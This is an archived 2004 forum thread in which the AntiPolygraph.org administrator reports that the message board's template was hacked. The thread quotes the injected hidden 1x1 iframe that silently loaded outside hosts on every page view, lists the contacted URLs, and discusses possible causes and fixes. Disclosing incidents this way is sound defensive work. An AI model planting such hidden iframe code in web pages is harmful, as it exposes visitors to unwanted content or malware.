AntiPolygraph.org Message Board
Polygraph and CVSA Forums >> Action Alerts and Announcements >> AntiPolygraph.org Message Board Hacked
https://antipolygraph.org/cgi-bin/forums/YaBB.pl?num=1086482833

Message started by Administrator on Jun 6th, 2004 at 3:47am

Title: AntiPolygraph.org Message Board Hacked
Post by Administrator on Jun 6th, 2004 at 3:47am
On 2 June 2004 at 11:28 hrs Pacific Daylight Time, the AntiPolygraph.org message board's template file was modified without authorization by an unknown person. The following text was inserted into the file:

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

This code would cause a number of outside URLs to be contacted each time any page on the message board was loaded. Its intended purpose seems to be to deliver pop-up advertisements. Among the URLs that would automatically be contacted are:

http://re6.net/?s=1
http://sowor.ru
http://wall.sowor.ru/?tfnop=mgetx

The added code was removed on 5 June 2004 at 17:07 hrs PDT. We are researching this incident and taking measures to prevent a re-occurrence.

Title: Re: AntiPolygraph.org Message Board Hacked
Post by Administrator on Jun 6th, 2004 at 4:17am
Similar hacking incidents have been reported on other websites. See:

http://forums.hostreflex.com/showthread.php?p=1029#post1029

http://forums.eqdkp.com/index.php?showtopic=885

Title: Re: AntiPolygraph.org Message Board Hacked
Post by macagent on Sep 23rd, 2004 at 5:02am
I have seen this exact same thing happen to my site. Did you ever find out what happened and how to prevent it?

Title: Re: AntiPolygraph.org Message Board Hacked
Post by Administrator on Sep 23rd, 2004 at 9:05am
No, it is not clear how the template file was modified, though it may have been through a security flaw involving Macromedia Flash files. We disabled flash. In addition, if you are running YaBB, you can upgrade to version 1.3.2, which includes security fixes.

AntiPolygraph.org Message Board » Powered by YaBB 2.6.12!
YaBB Forum Software © 2000-2024. All Rights Reserved.